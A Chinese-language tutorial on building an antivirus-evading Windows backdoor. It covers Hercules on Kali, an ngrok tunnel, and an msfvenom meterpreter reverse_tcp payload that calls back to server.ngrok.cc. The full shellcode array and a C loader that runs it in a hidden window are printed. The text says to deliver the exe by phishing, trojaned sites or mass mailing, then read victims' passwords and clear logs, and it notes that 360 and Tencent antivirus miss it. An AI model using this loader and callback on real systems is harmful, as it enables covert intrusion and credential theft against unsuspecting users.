本文适合学习,维护网络安全,做一个合法公民。Disk),反杀是指替换修改PE(.bat、.exe等)文件中出现的特征码。方法包括等价替换指令、字符串修改case、补码等。如今开源的东西不仅反杀率高、速度快、功能多,而且相对于手工可以长期维护。接下来介绍一下Hercules工具:1.安装KaliLinux需要安装虚拟机,运行下载的.iso(如果不用Kali,BT5也可以,Kali是升级版的BT系列)。二、搭建GO语言环境1、安装GO并解压到/usr/local目录下:2、配置环境使GO命令生效:在后面添加exportPATH=$PATH:/usr/local/go/bin文件:再次按Esc,保存并退出。检查配置是否正确:3、安装Hercules1,安装升级升级软件包:2、运行生成反杀加载选择(1),输入ip、端口号(用于反弹连接),然后输入y而且生成的文件名很简单,就不截图了。文件生成后,在在线查毒网站的检测下,发现很多杀毒软件都检测不到。四、内网穿透1、登录官网,添加隧道。在KaliLinux上访问ngrok网站(也可以使用花生壳进行内网穿透),注册并登录,然后点击隧道管理进入:点击确定添加,这样隧道就创建好了:2.运行客户端进入Kali,下载并运行ngrok客户端地址:https://www.ngrok.cc/#down-cl...,下载完linux版本并成功运行ngrok客户端后,内网穿透就开始Done了,外网地址为下图中的server.nogrok.cc:注册隧道的端口号5.反向端口连接使用MetaSpolitFramework,简称Msf框架。1.生成payloadmsfvenom-pwindows/meterpreter/reverse_tcp-ex86/shikata_ga_nai-i12-b'\x00'lhost=server.ngrok.cclport=00000-fc-p指定payload,-e编码器,-i编码次数(次数越多,免杀几率越高),-b去除坏字符,lhost服务器(ngrok默认为server.ngrok.cc)lport隧道端口,-f生成指定格式(py、exe等).,建议生成c)如果-f指定c,则复制输出buf[]:2.VC6.0编??译shellcode,不映射,直接贴代码#include#pragmacomment(linker,"/subsystem:\"windows\"/entry:\"mainCRTStartup\"")//运行unsignedcharbuf[]="\xbb\xa1\x7d\x04\x59\时不显示窗口xda\xca\xd9\x74\x24\xf4\x5d\x31\xc9\xb1""\x9e\x31\x5d\x14\x03\x5d\x14\x83\xed\xfc\x43\x88\xba\x1e\xde""\x61\xa6\x7a\x33\x5c\x5c\x5f\x47\x07\xae\x56\x16\x2f\x53\xa8""\x5c\x61\x24\x38\x5f\xf1\xd5\xd8\xed\x77\x1f\xc2\xb5\x4f\x0b""\x05\xb8\x9c\x44\xf1\x31\x77\xdc\x47\x2f\xaf\xa7\xf5\x50\xa9""\xa3\x45\xb7\x52\x62\x52\x8e\xb9\x03\x5e\xcd\x1f\xb8\xec\xa8""\x64\x3e\x96\x16\x0d\x3e\x5d\x30\x53\xa7\xcf\xf0\xd0\xaa\x32""\xe5\x6b\x12\x74\x50\xcb\xdd\x12\x89\xde\x29\x03\xca\xcb\xb8""\x2c\xd8\xdf\x42\xf8\xa2\x42\xdd\xdc\x31\xe8\x15\xe9\x40\x87""\x3c\x4b\xf7\x79\x30\x7b\x33\xee\xcc\x46\xa6\x17\x39\x57\xec""\xf0\xcc\x6d\xe3\x17\xf5\xe8\x5c\xc4\xd4\xbb\x26\x8c\xc0\x0e""\xe3\xab\xc6\xad\x84\x0d\x25\x9c\x37\x30\xd0\x3c\x81\x9e\x29""\x8b\xb5\xec\xd2\xbf\x01\xf0\xc6\x0d\xde\xa8\x9b\xe5\x72\x88""\x00\x21\xd8\xac\x78\xb4\xe7\x70\x05\xda\xe3\xa9\xaf\xcf\x2c""\x04\x6a\xe7\x0d\x2c\xc3\xce\x3a\x48\x0f\x94\xac\xb9\xb8\xcb""\xa6\xdf\xed\xf8\x1d\x75\x4e\x16\x78\xb6\xe8\x0c\x07\x48\x84""\xce\x79\xd4\xa0\x68\x8f\xc5\xd4\xde\x31\x13\x27\x4e\xa7\xaf""\x51\x54\x8a\x12\x1a\xb7\x8a\x97\x60\x10\x48\x01\x6c\x39\x46""\x40\x07\x8d\xe1\x19\xf4\x65\x25\x87\xd5\x27\x8b\x11\x7f\xcb""\xd2\x30\x0f\x91\x2f\x30\x55\x1d\x7d\xef\xb0\x03\x98\x59\x0e""\x29\xc5\xbd\x6c\x8b\xe1\x84\x8f\xee\xc9\x22\xe9\x62\xf1\x06""\x19\xf1\xbe\xa5\x8c\x88\xed\xc2\x71\x70\x01\x59\x4c\x15\x5a""\xe4\xe8\x75\x3c\xdc\x96\xd5\x41\x70\xe3\x60\x7d\x45\x29\x56""\xd2\xf4\x73\xb5\x06\xc7\xba\x53\x22\xdd\xbd\x5d\x89\x91\xe6""\x72\xfc\x75\x37\xbc\xed\xbb\x16\x05\x01\x56\x3a\x32\x72\x69""\x93\xec\xa4\x7b\x33\xff\xd7\x92\x7d\x1c\xef\xd7\x75\x7d\x45""\x5f\x67\x47\x2b\x90\x9b\x6e\x82\xb4\x17\xcd\x3b\x45\x8b\x4d""\x45\x50\x71\xeb\xb9\x49\x42\x64\xd7\x0c\x67\x61\xee\x21\x6e""\x78\x7e\x32\x26\xe7\x65\x10\x9d\x69\x46\x21\x2f\x97\x3c\x3d""\xbe\xd7\x06\x2f\x5b\x81\xae\xe9\x22\x6d\xdc\x6d\x2f\x64\xfb""\xc1\xe1\xae\xf6\xc6\x0a\x73\x52\x10\x7c\xb0\x3f\xf2\x60\x69""\xaf\x05\x6a\xa6\x2a\x53\xec\xb8\x73\xdd\xd3\x2c\x82\xab\x64""\x97\xf3\xdb\xe8\x2f\x22\x50\xde\xf4\x2e\x97\x8a\x79\xf4\xdc""\x92\x37\x45\x23\x86\x63\x42\x5e\x98\xc2\x49\xc3\x1d\x34\x1d""\xac\x24\x76\xef\xd7\x69\x8d\xd2\x2c\x40\x1c\xa2\x36\x29\x6c""\xa5\x25\x01\xd7\xbd\x7c\x15\x54\x07\xaa\x2c\x5a\xeb\x53\x6d""\x3b\x3a\x45\x50\x6d\x4f\x96\xb3\xf9\xdb\x96\x29\x0d\x6a\xa9""\x58\x9f\xf0\x14\xc3\x79\x0c\x99\x3c\x58\xc0\x61\xb6\xca\x5d""\x61\x9f\xf9\x65\x99\xb4\x91\xac\x5d\x7c\xf5\x9c\x99\xe5\x60""\x99\xc9\x8d\xcb\xe7\xd4\xc3\x5c\xd6\x39\xd4\xe0\x71\x73\xa2""\x24\xdd\x3c\xb4\x82\xda\x2c\xaf\xa5\x1e\x48\xa7\xf5\x89\x4d""\xb6\x10\x74\xe5\x06\xf2\x5b\xfa\x3c\x58\x84\xc6\x68\x16\x8b""\x26\x7a\x2f\x2a\x0c\x40\xf8\x61\x8b\x49\x14\x27\xf7\xe5\x4f""\x9a\xe3\x47\xb7\x1a\x13\xe9\x16\x06\x84\xab\x70";main(){((void(*)(void))&buf)();}编译.cpp生成.exe接下来我们需要配置Msf反向端口监控3.Msf在监控Msf之前配置并运行psql(新版Msf增加了psqlsupport):ConfigureMsfutilization:至此我们大功告成,就等客户端运行我们的.exe(钓鱼、挂马、群发等)4.测试运行.exe,Msf显示已经连接back,后面的操作和Windows一样,读取对方密码,目录,清除日志等,运行完之后360和腾讯的杀毒软件都没有检测到任何问题...